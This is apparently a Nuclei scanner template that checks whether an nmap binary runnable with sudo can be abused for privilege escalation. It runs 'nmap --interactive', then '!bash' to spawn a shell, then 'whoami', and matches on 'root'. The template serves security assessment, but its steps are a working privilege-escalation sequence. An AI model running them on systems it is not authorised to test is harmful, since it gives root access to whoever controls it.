id: nmap-privesc
info:
  name: Nmap – Privilege Escalation
  author: pussycat0x
  severity: high
  description: |
    Nmap is a scanner for network and OS services detection. However, if misconfigured to be used with “sudo” or “administrator” privileges can lead to a privilege escalation.
  reference:
    - https://gtfobins.github.io/gtfobins/nmap/
  metadata:
    verified: true
  tags: code,linux,nmap,privesc,enum

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
        nmap --interactive

  - engine:
      - sh
      - bash
    source: |
        !bash

  - engine:
      - sh
      - bash
    source: |
        whoami

    matchers:
      - type: word
        part: code_2_response
        words:
          - "Welcome to Interactive Mode"
        condition: and  

      - type: word
        part: code_3_response
        words:
          - "root"
        condition: and  
# digest: 4a0a00473045022100a8b99fe56f24e56bead6d78d97d81e72a4443390b86d2b35f78b4cd7d648982a02204b270920298c5270918fbebb200b462ff2c53a49f80e8cf626c7a1b1494e0ab7:c8251d2f4b494560fa261588bedfe7b7
